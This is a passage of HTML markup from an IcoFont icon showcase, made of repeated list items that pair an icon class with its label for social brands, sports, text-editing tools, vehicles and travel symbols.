			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-virb"></i>
				</div> 
				<span> virb </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-virtuemart"></i>
				</div> 
				<span> virtuemart </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-vk"></i>
				</div> 
				<span> vk </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wechat"></i>
				</div> 
				<span> wechat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-weibo"></i>
				</div> 
				<span> weibo </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-whatsapp"></i>
				</div> 
				<span> whatsapp </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-xing"></i>
				</div> 
				<span> xing </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-yahoo"></i>
				</div> 
				<span> yahoo </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-yelp"></i>
				</div> 
				<span> yelp </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-youku"></i>
				</div> 
				<span> youku </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-youtube"></i>
				</div> 
				<span> youtube </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-zencart"></i>
				</div> 
				<span> zencart </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-badminton-birdie"></i>
				</div> 
				<span> badminton-birdie </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-baseball"></i>
				</div> 
				<span> baseball </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-baseballer"></i>
				</div> 
				<span> baseballer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-basketball-hoop"></i>
				</div> 
				<span> basketball-hoop </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-basketball"></i>
				</div> 
				<span> basketball </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-billiard-ball"></i>
				</div> 
				<span> billiard-ball </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-boot-alt-1"></i>
				</div> 
				<span> boot-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-boot-alt-2"></i>
				</div> 
				<span> boot-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-boot"></i>
				</div> 
				<span> boot </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bowling-alt"></i>
				</div> 
				<span> bowling-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bowling"></i>
				</div> 
				<span> bowling </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-canoe"></i>
				</div> 
				<span> canoe </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cheer-leader"></i>
				</div> 
				<span> cheer-leader </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-climbing"></i>
				</div> 
				<span> climbing </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-corner"></i>
				</div> 
				<span> corner </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-field-alt"></i>
				</div> 
				<span> field-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-field"></i>
				</div> 
				<span> field </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-football-alt"></i>
				</div> 
				<span> football-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-football-american"></i>
				</div> 
				<span> football-american </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-football"></i>
				</div> 
				<span> football </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-foul"></i>
				</div> 
				<span> foul </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-goal-keeper"></i>
				</div> 
				<span> goal-keeper </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-goal"></i>
				</div> 
				<span> goal </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-golf-alt"></i>
				</div> 
				<span> golf-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-golf-bag"></i>
				</div> 
				<span> golf-bag </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-golf-cart"></i>
				</div> 
				<span> golf-cart </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-golf-field"></i>
				</div> 
				<span> golf-field </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-golf"></i>
				</div> 
				<span> golf </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-golfer"></i>
				</div> 
				<span> golfer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-helmet"></i>
				</div> 
				<span> helmet </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hockey-alt"></i>
				</div> 
				<span> hockey-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hockey"></i>
				</div> 
				<span> hockey </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ice-skate"></i>
				</div> 
				<span> ice-skate </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-jersey-alt"></i>
				</div> 
				<span> jersey-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-jersey"></i>
				</div> 
				<span> jersey </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-jumping"></i>
				</div> 
				<span> jumping </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-kick"></i>
				</div> 
				<span> kick </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-leg"></i>
				</div> 
				<span> leg </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-match-review"></i>
				</div> 
				<span> match-review </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-medal-sport"></i>
				</div> 
				<span> medal-sport </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-offside"></i>
				</div> 
				<span> offside </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-olympic-logo"></i>
				</div> 
				<span> olympic-logo </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-olympic"></i>
				</div> 
				<span> olympic </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-padding"></i>
				</div> 
				<span> padding </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-penalty-card"></i>
				</div> 
				<span> penalty-card </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-racer"></i>
				</div> 
				<span> racer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-racing-car"></i>
				</div> 
				<span> racing-car </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-racing-flag-alt"></i>
				</div> 
				<span> racing-flag-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-racing-flag"></i>
				</div> 
				<span> racing-flag </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-racings-wheel"></i>
				</div> 
				<span> racings-wheel </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-referee"></i>
				</div> 
				<span> referee </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-refree-jersey"></i>
				</div> 
				<span> refree-jersey </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-result-sport"></i>
				</div> 
				<span> result-sport </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rugby-ball"></i>
				</div> 
				<span> rugby-ball </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rugby-player"></i>
				</div> 
				<span> rugby-player </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rugby"></i>
				</div> 
				<span> rugby </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-runner-alt-1"></i>
				</div> 
				<span> runner-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-runner-alt-2"></i>
				</div> 
				<span> runner-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-runner"></i>
				</div> 
				<span> runner </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-score-board"></i>
				</div> 
				<span> score-board </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-skiing-man"></i>
				</div> 
				<span> skiing-man </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-skydiving-goggles"></i>
				</div> 
				<span> skydiving-goggles </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snow-mobile"></i>
				</div> 
				<span> snow-mobile </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-steering"></i>
				</div> 
				<span> steering </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-stopwatch"></i>
				</div> 
				<span> stopwatch </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-substitute"></i>
				</div> 
				<span> substitute </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-swimmer"></i>
				</div> 
				<span> swimmer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-table-tennis"></i>
				</div> 
				<span> table-tennis </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-team-alt"></i>
				</div> 
				<span> team-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-team"></i>
				</div> 
				<span> team </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tennis-player"></i>
				</div> 
				<span> tennis-player </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tennis"></i>
				</div> 
				<span> tennis </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tracking"></i>
				</div> 
				<span> tracking </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-trophy-alt"></i>
				</div> 
				<span> trophy-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-trophy"></i>
				</div> 
				<span> trophy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-volleyball-alt"></i>
				</div> 
				<span> volleyball-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-volleyball-fire"></i>
				</div> 
				<span> volleyball-fire </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-volleyball"></i>
				</div> 
				<span> volleyball </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-water-bottle"></i>
				</div> 
				<span> water-bottle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-whistle-alt"></i>
				</div> 
				<span> whistle-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-whistle"></i>
				</div> 
				<span> whistle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-win-trophy"></i>
				</div> 
				<span> win-trophy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-align-center"></i>
				</div> 
				<span> align-center </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-align-left"></i>
				</div> 
				<span> align-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-align-right"></i>
				</div> 
				<span> align-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-all-caps"></i>
				</div> 
				<span> all-caps </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bold"></i>
				</div> 
				<span> bold </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brush"></i>
				</div> 
				<span> brush </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-clip-board"></i>
				</div> 
				<span> clip-board </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-code-alt"></i>
				</div> 
				<span> code-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-color-bucket"></i>
				</div> 
				<span> color-bucket </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-color-picker"></i>
				</div> 
				<span> color-picker </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-copy-invert"></i>
				</div> 
				<span> copy-invert </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-copy"></i>
				</div> 
				<span> copy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cut"></i>
				</div> 
				<span> cut </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-delete-alt"></i>
				</div> 
				<span> delete-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-edit-alt"></i>
				</div> 
				<span> edit-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-eraser-alt"></i>
				</div> 
				<span> eraser-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-font"></i>
				</div> 
				<span> font </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-heading"></i>
				</div> 
				<span> heading </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-indent"></i>
				</div> 
				<span> indent </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-italic-alt"></i>
				</div> 
				<span> italic-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-italic"></i>
				</div> 
				<span> italic </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-justify-all"></i>
				</div> 
				<span> justify-all </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-justify-center"></i>
				</div> 
				<span> justify-center </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-justify-left"></i>
				</div> 
				<span> justify-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-justify-right"></i>
				</div> 
				<span> justify-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-link-broken"></i>
				</div> 
				<span> link-broken </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-outdent"></i>
				</div> 
				<span> outdent </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-paper-clip"></i>
				</div> 
				<span> paper-clip </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-paragraph"></i>
				</div> 
				<span> paragraph </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pin"></i>
				</div> 
				<span> pin </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-printer"></i>
				</div> 
				<span> printer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-redo"></i>
				</div> 
				<span> redo </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rotation"></i>
				</div> 
				<span> rotation </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-save"></i>
				</div> 
				<span> save </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-small-cap"></i>
				</div> 
				<span> small-cap </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-strike-through"></i>
				</div> 
				<span> strike-through </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sub-listing"></i>
				</div> 
				<span> sub-listing </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-subscript"></i>
				</div> 
				<span> subscript </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-superscript"></i>
				</div> 
				<span> superscript </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-table"></i>
				</div> 
				<span> table </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-text-height"></i>
				</div> 
				<span> text-height </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-text-width"></i>
				</div> 
				<span> text-width </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-trash"></i>
				</div> 
				<span> trash </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-underline"></i>
				</div> 
				<span> underline </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-undo"></i>
				</div> 
				<span> undo </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-air-balloon"></i>
				</div> 
				<span> air-balloon </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-airplane-alt"></i>
				</div> 
				<span> airplane-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-airplane"></i>
				</div> 
				<span> airplane </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-articulated-truck"></i>
				</div> 
				<span> articulated-truck </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-auto-mobile"></i>
				</div> 
				<span> auto-mobile </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-auto-rickshaw"></i>
				</div> 
				<span> auto-rickshaw </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bicycle-alt-1"></i>
				</div> 
				<span> bicycle-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bicycle-alt-2"></i>
				</div> 
				<span> bicycle-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bicycle"></i>
				</div> 
				<span> bicycle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bus-alt-1"></i>
				</div> 
				<span> bus-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bus-alt-2"></i>
				</div> 
				<span> bus-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bus-alt-3"></i>
				</div> 
				<span> bus-alt-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bus"></i>
				</div> 
				<span> bus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cab"></i>
				</div> 
				<span> cab </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cable-car"></i>
				</div> 
				<span> cable-car </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-car-alt-1"></i>
				</div> 
				<span> car-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-car-alt-2"></i>
				</div> 
				<span> car-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-car-alt-3"></i>
				</div> 
				<span> car-alt-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-car-alt-4"></i>
				</div> 
				<span> car-alt-4 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-car"></i>
				</div> 
				<span> car </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-delivery-time"></i>
				</div> 
				<span> delivery-time </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fast-delivery"></i>
				</div> 
				<span> fast-delivery </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fire-truck-alt"></i>
				</div> 
				<span> fire-truck-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fire-truck"></i>
				</div> 
				<span> fire-truck </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-free-delivery"></i>
				</div> 
				<span> free-delivery </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-helicopter"></i>
				</div> 
				<span> helicopter </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-motor-bike-alt"></i>
				</div> 
				<span> motor-bike-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-motor-bike"></i>
				</div> 
				<span> motor-bike </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-motor-biker"></i>
				</div> 
				<span> motor-biker </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-oil-truck"></i>
				</div> 
				<span> oil-truck </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rickshaw"></i>
				</div> 
				<span> rickshaw </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rocket-alt-1"></i>
				</div> 
				<span> rocket-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rocket-alt-2"></i>
				</div> 
				<span> rocket-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rocket"></i>
				</div> 
				<span> rocket </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sail-boat-alt-1"></i>
				</div> 
				<span> sail-boat-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sail-boat-alt-2"></i>
				</div> 
				<span> sail-boat-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sail-boat"></i>
				</div> 
				<span> sail-boat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-scooter"></i>
				</div> 
				<span> scooter </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sea-plane"></i>
				</div> 
				<span> sea-plane </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ship-alt"></i>
				</div> 
				<span> ship-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ship"></i>
				</div> 
				<span> ship </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-speed-boat"></i>
				</div> 
				<span> speed-boat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-taxi"></i>
				</div> 
				<span> taxi </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tractor"></i>
				</div> 
				<span> tractor </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-train-line"></i>
				</div> 
				<span> train-line </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-train-steam"></i>
				</div> 
				<span> train-steam </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tram"></i>
				</div> 
				<span> tram </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-truck-alt"></i>
				</div> 
				<span> truck-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-truck-loaded"></i>
				</div> 
				<span> truck-loaded </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-truck"></i>
				</div> 
				<span> truck </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-van-alt"></i>
				</div> 
				<span> van-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-van"></i>
				</div> 
				<span> van </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-yacht"></i>
				</div> 
				<span> yacht </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-5-star-hotel"></i>
				</div> 
				<span> 5-star-hotel </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-air-ticket"></i>
				</div> 
				<span> air-ticket </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-beach-bed"></i>
				</div> 
				<span> beach-bed </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-beach"></i>
				</div> 
				<span> beach </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
